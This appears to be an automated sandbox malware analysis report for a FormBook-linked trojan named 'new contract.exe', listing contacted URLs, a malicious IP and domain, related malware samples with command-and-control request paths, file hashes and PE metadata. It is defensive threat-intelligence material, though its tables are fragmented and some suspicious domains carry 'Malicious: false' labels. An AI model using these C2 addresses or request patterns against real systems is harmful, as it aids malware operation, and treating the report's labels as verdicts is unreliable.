| https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | explorer.exe: 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu | explorer.exe: 00000003.00000000.1745295797.00000000078AD000.00000004.00000001.00020000.00000000.sdmp; 00000003.00000002.4133315277.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | false | | unknown |
| http://www.innivip.bio/c89p/www.aser-cap-hair-growth.today | S1 | false | | unknown |
| https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win | S2 | false | | unknown |
| http://www.arklife.shop | S1 | false | | unknown |
| http://www.sofaerb.shop | S1 | false | | unknown |
| https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew | S2 | false | URL Reputation: safe | unknown |
| http://schemas.micr | explorer.exe: 00000003.00000000.1745295797.00000000079B1000.00000004.00000001.00020000.00000000.sdmp; 00000003.00000003.3484154679.00000000079B5000.00000004.00000001.00020000.00000000.sdmp; 00000003.00000003.3108475652.00000000079B5000.00000004.00000001.00020000.00000000.sdmp; 00000003.00000002.4133315277.00000000079B1000.00000004.00000001.00020000.00000000.sdmp | false | | unknown |
| https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow- | S2 | false | | unknown |
| http://www.oviepicker.net | S1 | false | | unknown |
| http://www.r64mh1.vip | S1 | false | | unknown |
                                                                                                              unknown
                                                                                                              http://www.carterandcone.comlnew contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                http://www.fontbureau.com/designers/frere-user.htmlnew contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    http://www.olar-systems-panels-61747.bond/c89p/www.arklife.shopexplorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      http://www.uickautoquote.netReferer:explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        https://android.notify.windows.com/iOSexplorer.exe, 00000003.00000000.1762772794.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4141038919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000003.00000000.1745295797.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          https://outlook.com_explorer.exe, 00000003.00000000.1762772794.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4141038919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            http://www.aycare-service-99683.bondReferer:explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  http://www.torehousestudio.info/c89p/explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    http://www.fontbureau.com/designersGnew contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    http://schemas.miexplorer.exe, 00000003.00000000.1745295797.00000000079B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3484154679.00000000079B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108475652.00000000079B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.00000000079B1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      http://www.fontbureau.com/designers/?new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://www.plesacv.xyzReferer:explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        http://www.founder.com.cn/cn/bThenew contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        http://www.fontbureau.com/designers?new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000003.00000002.4133315277.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          https://powerpoint.office.comcemberexplorer.exe, 00000003.00000000.1762772794.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4141038919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          http://www.sofaerb.shop/c89p/www.uickautoquote.netexplorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            http://www.tiro.comnew contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              http://www.innivip.bioReferer:explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                http://www.goodfont.co.krnew contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                http://www.uickautoquote.netexplorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  http://schemas.microexplorer.exe, 00000003.00000000.1755546236.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4136528142.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1749262863.0000000007F40000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://www.aser-cap-hair-growth.todayReferer:explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    http://www.aser-cap-hair-growth.todayexplorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      http://www.typography.netDnew contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown
                                                                                                                                                      http://www.galapagosdesign.com/staff/dennis.htmnew contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown
                                                                                                                                                      http://www.hinawinner.topReferer:explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          https://api.msn.com/qexplorer.exe, 00000003.00000000.1752045440.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108632093.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4137734556.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              http://www.fonts.comnew contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://www.sandoll.co.krnew contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                http://www.ldkp.netReferer:explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  http://www.sakkal.comnew contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
Reputation: unknown

Name: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Reputation: unknown

Name: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Reputation: unknown

Name: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000003.00000000.1745295797.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Reputation: unknown

Name: http://www.livialiving.online/c89p/www.innivip.bio
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Reputation: unknown
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
89.31.143.90 | www.igmoto.info | Germany | | 15598 | QSC-AG-IPXDE | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1531093
Start date and time: 2024-10-10 21:04:06 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 8s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
Sample name: new contract.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@10/1@11/1
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 119
  • Number of non-executed functions: 317
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Override analysis time to 240000 for current running targets taking high CPU consumption
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, svchost.exe
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • Not all processes were analyzed, report is missing behavior information
  • Report creation exceeded maximum time and may have missing disassembly code information.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtEnumerateKey calls found.
  • Report size getting too big, too many NtOpenKey calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • VT rate limit hit for: new contract.exe
Time | Type | Description
15:04:59 | API Interceptor | 2x Sleep call for process: new contract.exe modified
15:05:09 | API Interceptor | 7255810x Sleep call for process: explorer.exe modified
15:05:48 | API Interceptor | 6463623x Sleep call for process: NETSTAT.EXE modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
89.31.143.90 | z61SwiftCopyOfPayment.exe | Get hash | malicious | FormBook | Browse
  • www.defi-banksystem.online/jd21/?pPA800q0=OfBw10hwpCCrpj6SWyg7DTf/L6lD4iBR/skVq0WtSp6vFrxfDc86zYTahsBzIv7sBslXrUXtcg==&SZ=dnxdCh7P22ilbRg
89.31.143.90 | Quotation #10091.exe | Get hash | malicious | FormBook | Browse
  • www.igmoto.info/c89p/?9rglphR0=uK/A8O7zjdQhDaN+OEATE3Xrf7RWVy6yiEUunzdvsHMfMNs/vPJv/pK5tRu4O55vsOUb+soYKw==&_FQtYF=uVEdzxQhb0e4
89.31.143.90 | LisectAVT_2403002B_309.exe | Get hash | malicious | Bdaejec, FormBook | Browse
  • www.pandafitnessboo.com/34ev/
89.31.143.90 | LisectAVT_2403002B_466.exe | Get hash | malicious | FormBook | Browse
  • www.pandafitnessboo.com/d5fo/
89.31.143.90 | eqqjbbjMlt.elf | Get hash | malicious | Unknown | Browse
  • lucem.be/wordpress/wp-login.php
89.31.143.90 | Fzfee1Lgc2.elf | Get hash | malicious | Unknown | Browse
  • brainix.de/
89.31.143.90 | Petromasila 16072024.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse
  • www.sophi.page/5j76/
89.31.143.90 | unexpressiveness.exe | Get hash | malicious | FormBook, GuLoader | Browse
  • www.pandafitnessboo.com/k77u/
89.31.143.90 | Ballahoo.exe | Get hash | malicious | FormBook, GuLoader | Browse
  • www.pandafitnessboo.com/k77u/
89.31.143.90 | PO Copy_7854569.exe | Get hash | malicious | FormBook | Browse
  • www.leaflearn.store/a42m/
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
www.igmoto.info | Quotation #10091.exe | Get hash | malicious | FormBook | Browse
  • 89.31.143.90
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
QSC-AG-IPXDE | z61SwiftCopyOfPayment.exe | Get hash | malicious | FormBook | Browse
  • 89.31.143.90
QSC-AG-IPXDE | Quotation #10091.exe | Get hash | malicious | FormBook | Browse
  • 89.31.143.90
QSC-AG-IPXDE | firmware.armv4l.elf | Get hash | malicious | Unknown | Browse
  • 89.31.143.90
QSC-AG-IPXDE | SecuriteInfo.com.Linux.Siggen.9999.14080.25460.elf | Get hash | malicious | Mirai | Browse
  • 82.149.82.249
QSC-AG-IPXDE | KKveTTgaAAsecNNaaaa.ppc.elf | Get hash | malicious | Unknown | Browse
  • 80.190.241.214
QSC-AG-IPXDE | z55FACTURADEPROFORMApdf.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse
  • 89.31.143.90
QSC-AG-IPXDE | Transferencia bancaria.scr.exe | Get hash | malicious | FormBook | Browse
  • 89.31.143.90
QSC-AG-IPXDE | xprot-v6106eu.exe | Get hash | malicious | MeshAgent | Browse
  • 81.17.102.224
QSC-AG-IPXDE | xprot-v6106eu.exe | Get hash | malicious | MeshAgent | Browse
  • 81.17.102.224
QSC-AG-IPXDE | sora.mips.elf | Get hash | malicious | Mirai | Browse
  • 80.190.153.237
No context
No context

Process: C:\Users\user\Desktop\new contract.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: true
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.829540406878151
TrID:
  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
  • Win32 Executable (generic) a (10002005/4) 49.78%
  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
  • Generic Win/DOS Executable (2004/3) 0.01%
  • DOS Executable Generic (2002/1) 0.01%
File name: new contract.exe
File size: 601'600 bytes
MD5: c6b38036b68ea21306e8814ab1b1b4d9
SHA1: 6b1ee982b77f2274ff6844f06706f13418dc6aa0
SHA256: 732336eccda1e0e01a9474a968eb6ac9725fec8e8e03ad950472df75ba470693
SHA512: ffe83694f14e956fcd63e0f83845a1d631da501cfbf3552f0bc043d228b3fe59465a6c30bfd5c4bb98faaa89d00ecc4bf5881734a9d26d40759f7ce45eeee833
SSDEEP: 12288:b5WqpMT1dGUsVYQP3OT0UuA/4jj2m5tpyoBfVN07dq9ovF6sDYSuk7xLZXo:bw0c1dGUsVYQ6uO/mbhVKqqYVk7xdo
TLSH: EDD412A66A29DE22D88217B65431EB7717762EDCF021E3078FFEFCE3740A7601954291
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..g..............0..............5... ...@....@.. ....................................`................................
Icon Hash: 01242c66198d8d9e
Entrypoint: 0x4935fa
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x67079D75 [Thu Oct 10 09:25:09 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
                                                                                                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al  (this instruction is repeated 97 times: the disassembly of the zero bytes that follow the entry stub)
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x935a8 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x94000 | 0x13a0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x96000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
